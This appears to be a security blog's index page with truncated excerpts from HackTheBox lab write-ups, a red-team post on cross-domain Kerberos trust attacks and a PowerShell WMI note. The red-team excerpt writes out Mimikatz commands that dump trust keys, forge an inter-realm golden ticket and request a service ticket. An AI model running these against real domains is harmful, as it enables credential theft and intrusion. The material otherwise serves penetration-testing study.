HACKTHEBOX * Vulnerable Machine Writeup

TEACHER (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.153 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-20 22:42 EDT Nmap scan report for 10.10.10.153 Host is up (0.14s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Blackhat highschool No exact OS matches for host (If you know…

HACKTHEBOX * Vulnerable Machine Writeup

ELLINGSON (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.139 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-20 13:51 GMT Nmap scan report for 10.10.10.139 Host is up (0.25s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 49:e8:f1:2a:80:62:de:7e:02:40:a1:f4:30:d2:88:a6 (RSA) | 256 c8:02:cf:a0:f2:d8:5d:4f:7d:c7:66:0b:4d:5d:0b:df (ECDSA) |_…

Powershell * RED TEAM SECURITY

Privilege Escalation Across Trust

Priv esc across domains : trust tickets: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”lsadump::trust /patch”‘ An inter-realm TGT can be forged: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::golden /domain:security.local /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /rc4:62e72bcfbac429fa51d15ec57caa506d /user:administrator /service:krbtgt /target:security.local /ticket:ticket.kirbi”‘ Gets a TGT for a service (CIFS below) in the target domain by using the forged trust ticket. PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> asktgs.exe C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration\ticket.kirbi CIFS/WIN-2RUMVG5JPOC.security.local…

Powershell * WMI

Classes Remove an Object

WMI returns live, editable objects so place be careful while removing on object: PS C:\Windows\system32> Get-WmiObject -Class win32_process | where-object {$_.Name -eq “notepad.exe”} | Remove-WmiObject PS C:\Windows\system32> Get-CimInstance -ClassName win32_process -Filter “Name = ‘notepad.exe’” | remove-ciminstance PS C:\Windows\system32> Get-WmiObject -class win32_process -filter ‘Name = “calculator.exe”‘ PS C:\Windows\system32> Get-WmiObject -class win32_process –list Exploring Methods: Find all…